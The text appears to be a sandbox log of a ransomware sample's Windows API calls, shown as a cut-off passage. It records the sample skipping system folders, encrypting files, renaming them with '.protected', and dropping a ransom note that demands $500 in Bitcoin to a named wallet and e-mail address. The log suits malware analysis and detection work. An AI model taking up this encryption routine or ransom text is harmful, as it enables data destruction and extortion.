[0074.196] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.196] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.196] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.196] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.196] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.196] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\..") returned 86 [0074.196] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.196] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.196] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0074.196] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0074.196] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0074.196] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0074.196] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0074.196] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0074.196] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages") returned 92 [0074.196] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0074.196] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0074.196] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*") returned 94 [0074.196] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0074.197] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.197] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.197] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.197] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.197] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.197] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\.") returned 94 [0074.197] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.197] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0074.197] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.197] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.197] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.197] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.197] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.197] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\..") returned 95 [0074.197] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.197] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.197] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0074.197] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="Windows") returned -1 [0074.197] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="Program Files") returned 1 [0074.197] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="Program Files (x86)") returned 1 [0074.197] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="$Recycle.bin") returned 1 [0074.197] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="System Volume Information") returned 1 [0074.197] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86") returned 116 [0074.198] lstrcmpW (lpString1="vcRuntimeAdditional_x86", lpString2=".") returned 1 [0074.198] lstrcmpW (lpString1="vcRuntimeAdditional_x86", lpString2="..") returned 1 [0074.198] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*") returned 118 [0074.198] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0074.198] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.198] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.198] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.198] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.198] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.198] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\.") returned 118 [0074.198] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.198] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.199] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.199] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.199] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.199] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.199] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.199] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\..") returned 119 [0074.199] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.199] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.199] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.199] lstrcmpiW (lpString1="cab1.cab", lpString2="Windows") returned -1 [0074.199] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files") returned -1 [0074.199] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files (x86)") returned -1 [0074.199] lstrcmpiW (lpString1="cab1.cab", lpString2="$Recycle.bin") returned 1 [0074.199] lstrcmpiW (lpString1="cab1.cab", lpString2="System Volume Information") returned -1 [0074.199] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 125 [0074.199] StrStrIW (lpFirst="cab1.cab", lpSrch=".protected") returned 0x0 [0074.199] lstrcmpW (lpString1="cab1.cab", lpString2="RESTORE_FILES.txt") returned -1 [0074.199] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0074.199] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0074.199] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0074.200] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 125 [0074.200] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0074.200] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 125 [0074.200] StrStrW (lpFirst="cab1.cab", lpSrch=".rar") returned 0x0 [0074.200] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 125 [0074.200] StrStrW (lpFirst="cab1.cab", lpSrch=".zip") returned 0x0 [0074.200] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.202] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.202] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.202] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.202] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0074.204] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0074.204] CloseHandle (hObject=0xd8) returned 1 [0074.214] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab.protected") returned 135 [0074.214] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab.protected" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab.protected")) returned 1 [0074.214] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.214] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="Windows") returned -1 [0074.214] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="Program Files") returned 1 [0074.214] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="Program Files (x86)") returned 1 [0074.214] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="$Recycle.bin") returned 1 [0074.214] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="System Volume Information") returned 1 [0074.214] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 145 [0074.214] StrStrIW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".protected") returned 0x0 [0074.214] lstrcmpW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="RESTORE_FILES.txt") returned 1 [0074.214] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0074.214] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0074.214] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0074.215] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 145 [0074.215] StrStrW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".txt") returned 0x0 [0074.215] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 145 [0074.215] StrStrW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".rar") returned 0x0 [0074.215] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 145 [0074.215] StrStrW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".zip") returned 0x0 [0074.215] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.231] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.232] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.233] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.233] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0074.233] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0074.233] CloseHandle (hObject=0xd8) returned 1 [0074.234] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.protected") returned 155 [0074.234] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.protected" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.protected")) returned 1 [0074.235] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0074.235] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0074.235] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\RESTORE_FILES.txt") returned 134 [0074.235] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0074.245] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0074.245] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0074.246] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0074.246] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0074.246] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0074.246] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0074.246] CloseHandle (hObject=0xd4) returned 1 [0074.247] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0074.247] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0074.247] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\RESTORE_FILES.txt") returned 110 [0074.247] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0074.248] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0074.248] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0074.249] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0074.249] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0074.249] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0074.249] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0074.249] CloseHandle (hObject=0xb4) returned 1 [0074.249] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0074.249] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0074.250] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\RESTORE_FILES.txt") returned 101 [0074.250] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0074.250] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple 